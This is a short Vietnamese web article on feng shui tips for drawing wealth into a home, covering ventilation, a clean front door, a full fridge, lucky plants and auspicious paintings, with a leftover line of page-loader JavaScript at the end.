Những ứng dụng phong thủy nhà ở thu hút tiền tài

Nhà ở của mỗi gia đình khi bố trí phải lưu ý sao ch phù hợp nhất và luôn phải sạch sẽ . Áp dụng những ứng dụng phong thủy nhà ở sau đây giúp gia đình bạn luôn gặp may mắn và hút tài lộc.

Thông gió cho nhà ở

thong-gio-nha-o-phong-thuy

Thông gió các gian cho nhà ở phong thủy mang lại tài lộc

Trong phong thủy, không khí trong mỗi ngôi nhà ở buộc phải được lưu thông, di chuyển tất cả không gian trong nhà để tăng thịnh vượng. Chính vì thế, luồng không khí tượng trưng cho dòng chảy tài lộc, may mắn giúp gia chủ phát đạt, giàu có.

Đón điều tốt lành từ các ô cửa

Cửa chính là lối vào của cát khí trong mỗi ngôi nhà, vì thế khi nhìn vào cửa chính có thể biết được gia chủ nhận được nhiều hay ít tài khí, có ích hay là bất lợi, nhiều cản trở hay dễ dàng… Điều này thì cũng không có gì là khó, quý khách chỉ cần thường xuyên lau chùi, vệ sinh cửa nhà sạch sẽ để đón tài lộc thịnh vượng vào nhà.

Không để trống các ngăn tủ lạnh

tu-lanh-luon-day-phong-thuy-nha-o

Phong thủy nhà ở mang lại tài lộc thì tủ lạnh phải luôn đầy

Các ngăn trong tủ lạnh phải luôn chứa đầy đồ vì có liên quan chặt chẽ tới tiền tài dồi dào và có lợi cho sức khỏe của quý vị, mọi người sẽ tạo ra được nguồn tài lộc dồi dào và nhiều điều may mắn.

Trồng cây cảnh mang đến tốt lành về tiền tài

Tại góc Đông Nam hoặc góc hướng Đông của phòng khách, bạn có thể trồng những loại cây cát tường như: cây trúc, cây đồng tiền, cây hoa lan… những loại cây có năng lượng nuôi dưỡng tiền bạc khác nhau sẽ giúp gia chủ gặp nhiều may mắn và tài lộc.

Treo tranh phong thủy

Treo tranh phong thủy phù hợp tại vị trí phòng khách của nhà ở sẽ có nhiều điều tốt cho tài lộc của mọi người. Hai loại tranh tác động mạnh nhất tới tài lộc đó là tranh hoa Mẫu Đơn, hoặc tranh hoa Hướng Dương có tác động chiêu tài và tranh cá chép có ảnh hưởng chiêu tài.

d.getElementsByTagName(‘head’)[0].appendChild(s);